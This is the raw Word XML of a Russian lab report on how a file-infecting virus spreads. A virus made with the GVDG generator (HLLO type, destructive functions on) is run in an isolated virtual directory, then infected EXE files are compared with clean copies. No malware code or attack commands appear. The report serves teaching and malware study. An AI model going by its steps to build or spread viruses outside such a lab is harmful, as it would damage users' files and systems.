    <w:p w14:paraId="54393890" w14:textId="78AA5EEF" w:rsidR="00EE20CC" w:rsidRDefault="000E77B1" w:rsidP="00EE20CC">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Подготовка к работе</w:t>
      </w:r>
      <w:r w:rsidR="00EE20CC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D47B9" w14:textId="20013468" w:rsidR="00AB13BC" w:rsidRDefault="00AB13BC" w:rsidP="00AB13BC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На локальном диске виртуальной среды были созданы два каталога: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC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AB13B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/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC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AB13BC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AB13BC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC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69443F8A" w14:textId="17FD9E08" w:rsidR="00AB13BC" w:rsidRDefault="00AB13BC" w:rsidP="000E77B1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB13BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="159784F7" wp14:editId="3566C0B6">
            <wp:extent cx="5050256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939" cy="27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57B" w14:textId="2EEB42A3" w:rsidR="00AB13BC" w:rsidRDefault="00AB13BC" w:rsidP="00AB13BC">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1. Каталоги</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB13BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>локальном диске.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12682914" w14:textId="38F7B0E0" w:rsidR="00AB13BC" w:rsidRDefault="000E77B1" w:rsidP="00AB13BC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С помощью консоли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUBST</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B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X</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B1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0E77B1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0E77B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B1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0E77B1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0E77B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>был смонтирован в корневой уровень файловой системы (Рисунок 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114957B2" w14:textId="6ABD1313" w:rsidR="000E77B1" w:rsidRDefault="000E77B1" w:rsidP="000E77B1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000E77B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B10CA8E" wp14:editId="552ACA84">
            <wp:extent cx="5657850" cy="28888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450" cy="28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6ED" w14:textId="231F7AA1" w:rsidR="000E77B1" w:rsidRPr="000E77B1" w:rsidRDefault="000E77B1" w:rsidP="000E77B1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 2. Результат консольной команды, появился виртуальный диск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77B1">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF84B10" w14:textId="474F35DE" w:rsidR="000E77B1" w:rsidRPr="000E77B1" w:rsidRDefault="000E77B1" w:rsidP="000E77B1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Исследование механизма заражения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D4615" w14:textId="034331EB" w:rsidR="00EE20CC" w:rsidRDefault="00EE20CC" w:rsidP="00EE20CC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Был запущен генератор вирусов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE20CC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Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="000E77B1" w:rsidRPr="000E77B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE20CC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27EECBF3" w14:textId="5E4F277B" w:rsidR="00EE20CC" w:rsidRDefault="00EE20CC" w:rsidP="00115267">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE20CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C60FD14" wp14:editId="466CFDBD">
            <wp:extent cx="5000505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568" cy="3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8223" w14:textId="3648ADD7" w:rsidR="00EE20CC" w:rsidRDefault="00EE20CC" w:rsidP="00EE20CC">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="000E77B1" w:rsidRPr="004E49C8">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Главное меню генератора вирусов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE20CC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41D345" w14:textId="2E6EF8B8" w:rsidR="004E49C8" w:rsidRDefault="00115267" w:rsidP="004E49C8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Используя управляющие элементы интерфейса, были выбраны: тип вируса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HLL</w:t>
      </w:r>
      <w:r w:rsidR="00E844DA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00E844DA" w:rsidRPr="00E844DA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> деструктивные функции вируса, представленные на рисунке 4, а также включены параметры «Создавать исходники» и «Комментарии в исходниках».</w:t>
      </w:r>
      <w:r w:rsidR="00F75DD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> В результате был создан </w:t>
      </w:r>
      <w:r w:rsidR="00F75DD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidR="00F75DD9" w:rsidRPr="00F75DD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F75DD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>файл вируса, его код представлен в приложении 1</w:t>
      </w:r>
      <w:r w:rsidR="003C61CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F5FB3" w14:textId="380365D2" w:rsidR="00115267" w:rsidRDefault="00C90DC3" w:rsidP="00115267">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90DC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7565EFA5" wp14:editId="14712068">
            <wp:extent cx="5114440" cy="31082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658" cy="31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2FF" w14:textId="1E74BC90" w:rsidR="00D100E8" w:rsidRDefault="00115267" w:rsidP="00D100E8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 4. Параметры вируса-паразита.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72B427" w14:textId="3B99ADB5" w:rsidR="003C61CB" w:rsidRDefault="003C61CB" w:rsidP="003C61CB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Был изучен исходный код вируса на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pascal</w:t>
      </w:r>
      <w:r w:rsidR="00193F40">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и построена блок-схема алгоритма работы вируса, представленная в приложении 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9BB4B" w14:textId="70427462" w:rsidR="00142E5D" w:rsidRPr="00142E5D" w:rsidRDefault="00466C09" w:rsidP="00142E5D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сгенерированный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-файл вируса был скопирован в каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00466C09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466C09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туда же были помещены копии некоторых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00466C09">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>файлов, при этом эталонные копии были сохранены (Рисунок 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1C0BA" w14:textId="4D434BFD" w:rsidR="00EE20CC" w:rsidRDefault="00C90DC3" w:rsidP="00C90DC3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90DC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C713AF" wp14:editId="6128ACE8">
            <wp:extent cx="5372424" cy="31849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654" cy="31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F7E" w14:textId="7DF3D26A" w:rsidR="00466C09" w:rsidRDefault="00466C09" w:rsidP="00466C09">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 5. </w:t>
      </w:r>
      <w:r w:rsidR="009F62A9">
        <w:t>Каталог</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00466C09">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00DD7666">
        <w:t xml:space="preserve"> до заражения</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374910AA" w14:textId="57371AE9" w:rsidR="00466C09" w:rsidRDefault="009F62A9" w:rsidP="00466C09">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Скопированный вирус был запущен, в результате каталог заполнился ранее не существовавшими там файлами (Рисунок 6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78103EB9" w14:textId="0C165AEB" w:rsidR="009F62A9" w:rsidRDefault="00C90DC3" w:rsidP="009F62A9">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90DC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50AA8E3C" wp14:editId="296586F1">
            <wp:extent cx="5761908" cy="33786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66" cy="3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B48B" w14:textId="4FDA9FCA" w:rsidR="009F62A9" w:rsidRDefault="009F62A9" w:rsidP="009F62A9">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Рисунок 6. Каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="009F62A9">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="009F62A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>после заражения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130DF4E" w14:textId="0492AEAC" w:rsidR="009F62A9" w:rsidRDefault="00C90DC3" w:rsidP="009F62A9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> результате сравнения по содержимому с помощью </w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Total</w:t>
      </w:r>
      <w:r w:rsidR="0009414C" w:rsidRPr="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Commander</w:t>
      </w:r>
      <w:r w:rsidR="0009414C" w:rsidRPr="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>была</w:t>
      </w:r>
      <w:r w:rsidR="0009414C" w:rsidRPr="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>выдвинута</w:t>
      </w:r>
      <w:r w:rsidR="0009414C" w:rsidRPr="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0009414C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>гипотеза, что вирус внедряет себя в тело файла, записывая себя поверх заражаемого кода (Рисунок 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43A27A" w14:textId="6A954431" w:rsidR="0009414C" w:rsidRDefault="0009414C" w:rsidP="0009414C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0009414C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166263A2" wp14:editId="25A94A54">
            <wp:extent cx="5267584" cy="374284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514" cy="37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F72B" w14:textId="39C7F7E0" w:rsidR="0009414C" w:rsidRDefault="0009414C" w:rsidP="0009414C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 7. Сравнение по содержимому зараженного и эталонного файлов</w:t>
      </w:r>
      <w:r w:rsidR="00C35863">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D0DF0" w14:textId="3EF07FC8" w:rsidR="00C35863" w:rsidRDefault="00951EEB" w:rsidP="00C35863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В категорию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB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951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>был скопирован эталонный файл «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idademo</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>695_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>после чего был запущен соответствующий ему зараженный файл «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idademo</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>695_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">». В результате эталонный файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">изменил свою иконку и размер, а </w:t>
      </w:r>
      <w:r w:rsidR="00046E5E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>также</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> появились новые файлы, что свидетельствует о том, что «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idademo</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>695_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00951EEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>» был заражен</w:t>
      </w:r>
      <w:r w:rsidR="00046E5E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рисунок 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62FA84" w14:textId="20246C20" w:rsidR="00046E5E" w:rsidRDefault="00046E5E" w:rsidP="00046E5E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00046E5E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E70433A" wp14:editId="2FDBD919">
            <wp:extent cx="4928461" cy="29361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622" cy="29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B83" w14:textId="726EBB6A" w:rsidR="00046E5E" w:rsidRDefault="00046E5E" w:rsidP="00046E5E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 8. Новые зараженный и «мусорные» файлы после запуска зараженного файла «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idademo</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E5E">
        <w:t>695_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18BFA8" w14:textId="189BBB3D" w:rsidR="00046E5E" w:rsidRDefault="00046E5E" w:rsidP="00046E5E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С помощью встроенного в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E5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антивируса, была предпринята попытка вылечить исполняемые файлы в каталоге </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E5E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046E5E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
